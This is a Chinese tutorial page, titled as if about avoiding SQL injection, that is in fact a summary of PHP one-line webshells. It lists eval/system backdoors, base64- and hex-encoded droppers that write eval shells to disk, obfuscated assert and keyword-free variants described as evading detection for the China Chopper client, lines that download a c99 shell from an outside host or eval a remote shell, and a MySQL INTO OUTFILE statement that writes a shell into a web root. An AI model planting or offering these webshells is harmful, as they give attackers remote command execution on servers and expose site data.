php提供哪些函数来避免sql的注入(PHP与SQL语句写一句话木马总结)
类别:编程学习 浏览量:1073
时间:2021-10-05 00:39:58 php提供哪些函数来避免sql的注入
PHP与SQL语句写一句话木马总结一、基础类的一句话--功能仅限于验证漏洞了,实际中非常容易被查出出来:
|
<?php @ eval ( $_GET [ "code" ])?> <?php @system( $_POST [ "cmd" ])?> |
二、编码的替换的类型:
|
<?php @ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));?> //会生成<?php @eval($_POST['lostwolf']);?> <script language= "php" >@ fputs ( fopen ( base64_decode ( 'bG9zdC5waHA=' ),w), base64_decode ( 'PD9waHAgQGV2YWwoJF9QT1NUWydsb3N0d29sZiddKTs/Pg==' ));</script> //php在html内部的一种嵌入方式 <?php fputs ( fopen (pack( "H*" , "6c6f7374776f6c662e706870" ), "w" ),pack( "H*" , "3c3f406576616c28245f504f53545b6c6f7374776f6c665d293f3e" ))?> <?php session_start(); $_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); $_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' );?> |
三、其他类型:
|
<?php $_GET [a]( $_GET [b]);?> //?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29}; <?php assert( $_REQUEST [ "pass" ]);?> //菜刀连接 躲避检测 密码pass <?php substr (md5( $_REQUEST [ 'x' ]),28)== 'acd0' && eval ( $_REQUEST [ 'pass' ]);?> //菜刀提交 http://192.168.1.5/x.php?x=lostwolf 脚本类型:php 密码为 pass |
四、下载类型:
|
<?php echo copy ( "http://www.r57.me/c99.txt" , "lostwolf.php" ); ?> <? echo file_get_contents ( "..//cfg_database.php" );?> //显示某文件 <? eval ( file_get_contents ( "远程shell" )) ?> //运行远程shell |
五、无关键函数类型:
|
<?php $_ = "" ; $_ [+ "" ]= '' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" ); ?> <?php ${ '_' . $_ }[ '_' ](${ '_' . $_ }[ '__' ]);?> http: //site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass <? $_ = "" ; $_ [+ "" ]= '_' ; $_ = "$_" . "" ; $_ =( $_ [+ "" ]| "" ).( $_ [+ "" ]| "" ).( $_ [+ "" ]^ "" );?> |
六、补充知识点:
SQL写一句话(MySQL):
|
select "<?php @system($_POST[" pass "]);?>" into outfile "/home/webaccount/projectname/www/*.php" #前面是一句话内容 后面是绝对路径www下的PHP文件,同理其他脚本也可以 |
以上就是PHP一句话木马小结与SQL语句写一句话木马的详细内容,感谢大家的学习和对开心学习网的支持。
您可能感兴趣
- 在php中遍历数组使用(PHP读取远程txt文档到数组并实现遍历)
- php 获取证书列表(用PHP做了一个领取优惠券活动的示例代码)
- apache服务器对php的支持原理(php apache开启跨域模式过程详解)
- php各个模式使用场景(PHP 并发场景的几种解决方案)
- php的底层分析(PHP反射原理与用法深入分析)
- php商城支付接口(php实现银联商务公众号+服务窗支付的示例代码)
- phpstudy使用教程最新版(phpstudy安装使用图文教程)
- php 与asp对比(asp.net和php的区别点总结)
- php运用redis实现抢购实例(PHP+redis实现微博的拉模型案例详解)
- thinkphp5框架怎么打开(thinkphp5.1框架模板布局与模板继承用法分析)
- php数据错误处理函数(php中错误处理操作实例分析)
- python微信红包代码(php生成微信红包数组的方法)
- php无法读取txt文件(php写入txt乱码的解决方法)
- phpstudy不解析php代码(phpstudy伪静态设置的问题)
- php启用curl(php使用curl伪造浏览器访问操作示例)
- php实例说明(PHP中Static静态关键字功能与用法实例分析)
- 杭州旅游攻略()
- 云南旅游攻略(云南旅游攻略5天攻略)
- 收藏 春节假期,这些景区巨划算(收藏春节假期这些景区巨划算)
- 景区游玩,这些安全知识要牢记(这些安全知识要牢记)
- 各地出招烘 热 旅游(各地出招烘热旅游)
- 2021款起亚霸锐到店了 更换车标,竞争宝马X5有戏吗(2021款起亚霸锐到店了)
热门推荐
- sql server 共享锁
- filezilla搭建ftp服务教程(FileZilla 425 无法连接FTP的解决方法阿里云服务器)
- HTML5离线缓存
- frameset与iframe 的应用与区别
- sqlserver两表查询语句格式(sql server实现在多个数据库间快速查询某个表信息的方法)
- docker的安装部署(Docker快速安装Zookeeper的详细教程)
- python scrapy爬虫教程视频(详解python3 + Scrapy爬虫学习之创建项目)
- dedecms技术(dedecms 初级入门使用教程)
- python3列表的使用教程(对Python3 pyc 文件的使用详解)
- web渗透网络基础(响应式Web之流式网格系统)
排行榜
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9